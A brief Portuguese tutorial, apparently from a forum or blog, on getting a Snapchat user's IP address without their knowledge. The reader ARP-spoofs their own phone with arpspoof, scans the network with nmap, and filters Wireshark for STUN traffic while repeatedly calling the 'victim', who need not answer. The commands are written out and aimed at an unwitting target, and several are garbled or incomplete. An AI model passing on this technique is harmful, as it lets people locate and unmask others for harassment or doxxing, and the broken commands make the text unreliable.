Aqui estão algumas coisas que você precisará para fazer isso funcionar:
Requisitos: - Mac OS X / Kali linux (ou qualquer UNIX)
- Um telefone onde você tenha o snapchat (presumo que seja um telefone)
- Nmap
- Algumas ferramentas e pouco Conhecimento MITM!
Aqui está o tutorial:
Baixe o Wireshark Aqui -> https://www.wireshark.org
Baixe o arpspoof Aqui -> https://github.com/ivanvza/arpy - Somente MACOS* - Kali linux já tem isso!
1. Inicie o terminal e encaminhe o IP do seu laptop/pc com estes scripts:
Kali - "" sudo sysctl net.ipv4.ip_forward = 1 ""
"" sudo net.ipv4.ip_forward = 1 ""
Mac - "" sudo sysctl - w net.inet.ip.forwarding=1 ""
2. Encontre o ip local do seu dispositivo telefônico e anote-o.
nmap -sn <ip do gateway>/24 ex. nmap -sn (ou -sP) 192.168.0.1/24
3. Falsifique seu telefone.
arpspoof -i <interface> -t <ip do telefone> gateway
ex: arpspoof -i en0 -t 192.168.0.160 192.168.0.1
Às vezes você precisa inverter o arpspoof também, então por segurança, troque o gateway com o ip do telefone:
arpspoof -i en0 - t 192.168.0.1 192.168.0.160
4.
ip.addr == <telefone ip> && stun
ex. ip.addr == 192.168.0.160 && stun
5. Chame sua vítima no snap e continue ligando por cerca de 5 segundos.
ELES NÃO PRECISAM RESPONDER
Você verá no wireshark alguns pedidos de ligação, depois alguns outros STUN.
Esses últimos são o ip da sua vítima.